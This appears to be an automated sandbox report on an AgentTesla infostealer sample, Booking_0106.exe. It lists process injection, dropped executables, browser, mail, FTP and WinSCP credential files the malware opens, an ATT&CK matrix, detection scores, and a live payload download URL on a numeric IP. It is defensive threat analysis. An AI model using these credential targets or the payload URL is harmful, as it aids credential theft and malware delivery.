Source: C:\Users\user\Desktop\Booking_0106.exe	Memory written: C:\Users\user\Desktop\Booking_0106.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory written: C:\Users\user\AppData\Roaming\ibrzb.exe base: 570000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory written: C:\Users\user\AppData\Roaming\ibrzb.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Booking_0106.exe	Process created: C:\Users\user\AppData\Local\Temp\doc-d.exe "C:\Users\user\AppData\Local\Temp\doc-d.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process created: C:\Users\user\Desktop\Booking_0106.exe "C:\Users\user\Desktop\Booking_0106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"

Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Users\user\Desktop\Booking_0106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\doc-d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Users\user\Desktop\Booking_0106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Users\user\AppData\Roaming\ibrzb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Users\user\AppData\Roaming\ibrzb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Users\user\AppData\Roaming\ibrzb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Users\user\AppData\Roaming\ibrzb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Booking_0106.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.12.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Booking_0106.exe.4023d90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2962339297.000000000306C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2962339297.0000000003074000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2962867895.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2963837882.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2962339297.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2962867895.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2963837882.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2962867895.000000000312A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2962339297.000000000307A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2963837882.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 6096, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Booking_0106.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\ibrzb.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Booking_0106.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0.2.Booking_0106.exe.4023d90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2962339297.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2962867895.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2963837882.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 6096, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Booking_0106.exe.4023d90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2962339297.000000000306C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2962339297.0000000003074000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2962867895.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2963837882.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2962339297.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2962867895.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2963837882.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2962867895.000000000312A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2962339297.000000000307A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2963837882.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 6096, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Booking_0106.exe	61%	ReversingLabs	Win32.Trojan.SpywareX
Booking_0106.exe	67%	Virustotal		Browse
Booking_0106.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\doc-d.exe	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Roaming\ibrzb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\doc-d.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\doc-d.exe	47%	Virustotal		Browse
C:\Users\user\AppData\Roaming\ibrzb.exe	61%	ReversingLabs	Win32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\ibrzb.exe	67%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://172.86.66.70/3y/doci.exe	9%	Virustotal		Browse
http://172.86.66.70	5%	Virustotal		Browse
http://172.86.66.70/3y/doci.exeP	5%	Virustotal		Browse
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://172.86.66.70/3y/doci.exe	false	9%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000002.00000002.2962867895.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2963837882.000000000293C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2962339297.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2956507018.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-neti	Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/14436606/23354	Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003DE2000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003B22000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://172.86.66.70	doc-d.exe, 00000001.00000002.2274873731.0000000002740000.00000004.00000800.00020000.00000000.sdmp	false	5%, Virustotal, Browse	unknown
https://stackoverflow.com/q/11564914/23354;	Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://172.86.66.70D	doc-d.exe, 00000001.00000002.2274873731.0000000002760000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-net	Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://upx.sf.net	Amcache.hve.12.dr	false	URL Reputation: safe	unknown
https://api.ipify.org/t	Booking_0106.exe, 00000002.00000002.2962867895.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2963837882.000000000293C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2962339297.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Booking_0106.exe, 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, doc-d.exe, 00000001.00000002.2274873731.0000000002740000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000002.00000002.2962867895.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2963837882.000000000293C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2962339297.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://172.86.66.70/3y/doci.exeP	doc-d.exe, 00000001.00000002.2274873731.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	false	5%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.86.66.70	unknown	United States	9009	M247GB	false
162.254.34.31	unknown	United States	64200	VIVIDHOSTINGUS	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1526562
Start date and time:	2024-10-06 10:40:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
